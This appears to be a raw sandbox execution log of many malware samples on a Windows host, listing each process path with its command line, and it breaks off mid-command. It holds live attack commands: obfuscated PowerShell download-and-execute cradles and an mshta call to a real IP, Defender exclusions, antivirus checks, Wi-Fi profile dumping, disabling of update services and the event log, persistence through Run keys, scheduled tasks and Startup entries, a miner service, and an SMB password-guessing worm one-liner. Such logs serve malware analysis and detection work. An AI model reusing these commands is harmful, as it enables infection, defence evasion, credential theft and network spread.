C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x10c,0x254,0x7ff6849c5460,0x7ff6849c5470,0x7ff6849c5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 400
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1
C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe
"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"
C:\Users\Admin\Desktop\a\7mpPLxE.exe
"C:\Users\Admin\Desktop\a\7mpPLxE.exe"
C:\Users\Admin\Desktop\a\7mpPLxE.exe
"C:\Users\Admin\Desktop\a\7mpPLxE.exe"
C:\Users\Admin\Desktop\a\0fVlNye.exe
"C:\Users\Admin\Desktop\a\0fVlNye.exe"
C:\Users\Admin\Desktop\Files\bwapp.exe
"C:\Users\Admin\Desktop\Files\bwapp.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\Desktop\Files\System.exe
"C:\Users\Admin\Desktop\Files\System.exe"
C:\Users\Admin\Desktop\Files\._cache_System.exe
"C:\Users\Admin\Desktop\Files\._cache_System.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\Desktop\Files\test5.exe
"C:\Users\Admin\Desktop\Files\test5.exe"
C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"
C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe
"C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe"
C:\Users\Admin\Desktop\Files\v7wa24td.exe
"C:\Users\Admin\Desktop\Files\v7wa24td.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\._cache_System.exe'
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 29442
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
Reynolds.com l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SYSTEM32\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 217412
C:\Windows\SysWOW64\findstr.exe
findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
Possibly.pif N
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAHAAZAB4AGQAeQBlAHUAbAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwARABlAHMAawB0AG8AcABcAEYAaQBsAGUAcwBcAE8AcABkAHgAZAB5AGUAdQBsAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWQBqAGwAdwB1AHUAeQBzAC4AZQB4AGUA
C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
"C:\Users\Admin\Desktop\Files\Opdxdyeul.exe"
C:\Users\Admin\Desktop\a\IMG001.exe
"C:\Users\Admin\Desktop\a\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
C:\Users\Admin\Desktop\a\rh.exe
"C:\Users\Admin\Desktop\a\rh.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tftp.exe
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\Desktop\a\file.exe
"C:\Users\Admin\Desktop\a\file.exe"
C:\Windows\SYSTEM32\wscript.exe
"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4028 -ip 4028
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 620
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mshta.exe
mshta http://176.113.115.178/Windows-Update
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
C:\Users\Admin\AppData\Local\Temp\tftp.exe
"C:\Users\Admin\AppData\Local\Temp\tftp.exe"
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tftp.exe
C:\Users\Admin\AppData\Roaming\LB31.exe
"C:\Users\Admin\AppData\Roaming\LB31.exe"
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "LIB"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "LIB"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\ProgramData\Mig\Mig.exe
C:\ProgramData\Mig\Mig.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\dialer.exe
dialer.exe
C:\Users\Admin\AppData\Local\Temp\tftp.exe
"C:\Users\Admin\AppData\Local\Temp\tftp.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 7352 -ip 7352
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7352 -s 540
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 660 -p 7352 -ip 7352
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7352 -s 556
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -standby-timeout-ac 0
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe
Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp16B2.tmp"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe
"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\Desktop\a\L.exe
"C:\Users\Admin\Desktop\a\L.exe"
C:\Users\Admin\Desktop\a\ttl.exe
"C:\Users\Admin\Desktop\a\ttl.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Dk.cmd
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Users\Admin\Desktop\Files\abc.exe
"C:\Users\Admin\Desktop\Files\abc.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\QzMSuoZ4.xlsm"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\ProgramData\Synaptics\Synaptics.exe
C:\ProgramData\Synaptics\Synaptics.exe
C:\Users\Admin\Desktop\a\caspol.exe
"C:\Users\Admin\Desktop\a\caspol.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
C:\Users\Admin\Desktop\Files\WindowsUI.exe
"C:\Users\Admin\Desktop\Files\WindowsUI.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\ProgramData\euoxkxg\cqibun.exe
"C:\ProgramData\euoxkxg\cqibun.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0205& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start 